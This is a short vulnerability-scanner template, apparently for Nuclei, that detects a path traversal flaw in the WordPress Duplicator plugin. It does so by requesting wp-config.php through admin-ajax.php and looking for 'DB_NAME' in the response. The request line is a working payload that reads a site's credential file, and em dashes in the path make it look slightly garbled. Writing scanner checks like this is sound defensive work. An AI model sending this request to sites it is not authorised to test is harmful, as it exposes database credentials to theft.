id: wordpress-duplicator-path-traversal info: name: WordPress duplicator Path Traversal author: madrobot severity: high requests: - method: GET path: - "{{BaseURL}}/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php" matchers: - type: word words: - "DB_NAME" part: body